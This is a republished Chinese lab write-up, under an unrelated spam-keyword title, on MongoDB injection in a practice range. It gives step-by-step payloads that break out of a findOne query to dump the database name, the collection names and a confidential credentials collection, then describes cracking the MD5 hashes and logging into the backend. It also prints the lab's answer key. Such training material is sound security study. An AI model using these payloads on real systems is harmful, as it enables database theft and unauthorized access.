您的位置:首页 > 文旅 > 旅游 > 推广普通话的手抄报_中国深圳航空公司官网_什么是网络软文营销_河南百度推广公司

推广普通话的手抄报_中国深圳航空公司官网_什么是网络软文营销_河南百度推广公司

2025/5/1 4:07:12 来源:https://blog.csdn.net/m0_68706634/article/details/144275204  浏览:    关键词:推广普通话的手抄报_中国深圳航空公司官网_什么是网络软文营销_河南百度推广公司
推广普通话的手抄报_中国深圳航空公司官网_什么是网络软文营销_河南百度推广公司

MongoDB 是⼀个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案

MongoDB 是⼀个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最富,最像关系数据库的。MongoDB 将数据存储为⼀个文档,数据结构由键值(key=>value)对组成

靶场地址:SQL手工注入漏洞测试(MongoDB数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养

第一步:

给出的源码...可以看到数据库查询的语句如下..构造回显测试..

var data= db.notice.findOne({'id':'$id'});return data;
传⼊的数据是$id。注意到可以通过闭合 “({‘” 来构造payload 因为返回的数据是$obj[‘retval’][‘title’]与$obj[‘retval’][‘content’],可以尝试return({title:’1’,content:’2’})来构造回显测试
id=1'});return({title:'1',content:'2

第二步:查询数据库库名
获取数据库名称:
id=1'});return({title:tojson(db),content:'2

第三步:查询数据库表名
id=1'});return({title:tojson(db.getCollectionNames()),content:'2

第四步:查询数据库字段值
id=1'});return({title:tojson(db.Authority_confidential.find()[0]),content:'2

id=1'});return({title:tojson(db.Authority_confidential.find()[1]),content:'2

第五步:cmd5解密

地址:md5在线解密破解,md5解密加密

第六步:登录后台

KEY:mozhe82a

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com